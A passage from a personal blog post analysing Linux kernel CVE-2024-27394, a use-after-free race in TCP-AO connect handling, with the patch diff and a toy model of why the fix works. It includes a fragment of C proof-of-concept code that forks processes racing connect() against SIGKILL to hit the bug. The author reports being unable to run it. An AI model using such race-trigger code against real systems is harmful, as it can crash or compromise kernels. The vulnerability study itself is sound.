    cpu_set_t cset;
    CPU_ZERO( & cset);
    CPU_SET(cpu, & cset);
 
    if (sched_setaffinity(0, sizeof(cpu_set_t), & cset))
        perror("affinity");
}
 
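void *ao_connect(void *arg) {
    int *socks = arg; /* one row of SOCK_COUNT sockets */
    pid_t pid;

    for (int i = 0; i < SOCK_COUNT; i++) {
        pid = fork();
        if (pid == 0) {
            pin_this_task_to(0);

            if (connect(socks[i], (struct sockaddr * ) & serv_addr, sizeof(serv_addr)) < 0) {
                printf("\nConnection Failed \n");
                exit(EXIT_FAILURE);
            }
            exit(EXIT_SUCCESS); /* the child must not fall back into the loop */
        } else if (pid > 0) { /* skip on fork failure: kill(-1, ...) would signal every process */
            usleep(random_val(50000, 100000));
            kill(pid, SIGKILL);
            waitpid(pid, NULL, 0);
        }
    }
    return NULL;
}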
 
int main() {
        ...
        for (int i = 0; i < LOOP_COUNT; i++)
            pthread_create( & thr[i], NULL, ao_connect, socks[i]);

I wanted to run the PoC and tried to get it to compile through a good deal of troubleshooting, but with my still-limited skills I could not get it to run.

In the end, CVE-2024-27394 was patched by changing hlist_for_each_entry_rcu to hlist_for_each_entry_safe, which prevents the UAF whether or not the code runs inside an RCU read-side critical section.

diff --git a/net/ipv4/tcp_ao.c b/net/ipv4/tcp_ao.c
index 3afeeb68e8a7..781b67a52571 100644
--- a/net/ipv4/tcp_ao.c
+++ b/net/ipv4/tcp_ao.c
@@ -1068,6 +1068,7 @@ void tcp_ao_connect_init(struct sock *sk)
 {
  struct tcp_sock *tp = tcp_sk(sk);
  struct tcp_ao_info *ao_info;
+ struct hlist_node *next;
  union tcp_ao_addr *addr;
  struct tcp_ao_key *key;
  int family, l3index;
@@ -1090,7 +1091,7 @@ void tcp_ao_connect_init(struct sock *sk)
  l3index = l3mdev_master_ifindex_by_index(sock_net(sk),
        sk->sk_bound_dev_if);
 
- hlist_for_each_entry_rcu(key, &ao_info->head, node) {
+ hlist_for_each_entry_safe(key, next, &ao_info->head, node) {
   if (!tcp_ao_key_cmp(key, l3index, addr, key->prefixlen, family, -1, -1))
    continue;
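Why the _safe variant helps can be shown with a userspace model of the two loop shapes. This is a sketch, not the kernel macros: toy_free() only sets a flag instead of freeing memory, so a "stale load" can be counted without actually invoking undefined behavior, and it models the worst case in which the reclaim callback has already run by the time the loop advances. All names are made up for illustration.

```c
#include <assert.h>
#include <stddef.h>

struct toy_key {
    struct toy_key *next;
    int freed;   /* set by toy_free(); stands in for kfree() */
};

static void toy_free(struct toy_key *k)
{
    k->freed = 1;
}

/* Every load of ->next goes through here so stale loads can be counted. */
static struct toy_key *load_next(struct toy_key *k, int *stale_loads)
{
    assert(k != NULL);
    if (k->freed)
        (*stale_loads)++;
    return k->next;
}

/* Shape of the vulnerable loop: ->next is loaded after the body has run. */
static int walk_like_rcu(struct toy_key *head)
{
    int stale_loads = 0;
    struct toy_key *k = head;

    while (k != NULL) {
        toy_free(k);                      /* callback already ran */
        k = load_next(k, &stale_loads);   /* reads a freed key */
    }
    return stale_loads;
}

/* Shape of the patched loop: ->next is saved before the body runs. */
static int walk_like_safe(struct toy_key *head)
{
    int stale_loads = 0;
    struct toy_key *k = head, *next;

    while (k != NULL) {
        next = load_next(k, &stale_loads);  /* key is still live here */
        toy_free(k);
        k = next;                           /* k itself is never touched again */
    }
    return stale_loads;
}
```

With three keys, the first walker performs three stale loads and the second performs none, which matches the one-line change in the diff above.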

Conclusion

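The first thing that comes to mind after finishing this post is that I picked a vulnerability that was too hard to start with. It is a recent vulnerability from 2024 and a UAF triggered inside TCP internals, so I did not go in taking it lightly, but it still turned out to be much harder than I expected.
That said, studying it taught me a lot about things I had never run into while focusing on CTFs since I started learning hacking: how RCU works, the connect() call stack, how race-condition vulnerabilities arise, and so on.
At the same time, there were many parts I did not fully understand (especially the hlist_for_each_entry_rcu loop in tcp_ao_connect_init()), and I could not run the PoC, so the analysis leaves a lot to be desired.
I will build up my skills and take another shot at this analysis later.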

Reference

https://blog.theori.io/deep-dive-into-rcu-race-condition-analysis-of-tcp-ao-uaf-cve-2024-27394-f40508b84c42
